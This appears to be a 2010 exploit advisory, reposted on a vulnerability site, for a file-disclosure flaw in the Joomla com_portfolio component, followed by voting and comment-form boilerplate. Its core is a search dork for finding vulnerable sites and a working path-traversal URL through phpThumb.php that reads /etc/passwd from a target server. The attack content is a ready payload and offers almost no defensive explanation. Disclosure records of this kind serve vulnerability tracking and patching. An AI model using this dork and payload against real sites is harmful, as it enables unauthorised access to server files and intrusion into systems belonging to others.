The Joomla Portfolio component local file inclusion

2010-04-22 / 2010-04-23

Credit: Mr.tro0oqy

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Joomla compnent com_portfolio Local File Disclosure

author : Mr.tro0oqy from comunity college :(

email : t.4@windowslive.com

greetz:alzomer , Mr.ksoory , R3d-D3vil from palstine .. 

dork :inurl:index.php?option=com_portfolio

exp:

http://www.target.com/components/com_portfolio/includes/phpthumb/phpThumb.php?w=800&src=../../../../etc/passwd

_________________________________________________________________
Your E-mail and More On-the-Go. Get Windows Live Hotmail Free.
https://signup.live.com/signup.aspx?id=60969

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

The Joomla Portfolio component local file inclusion

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.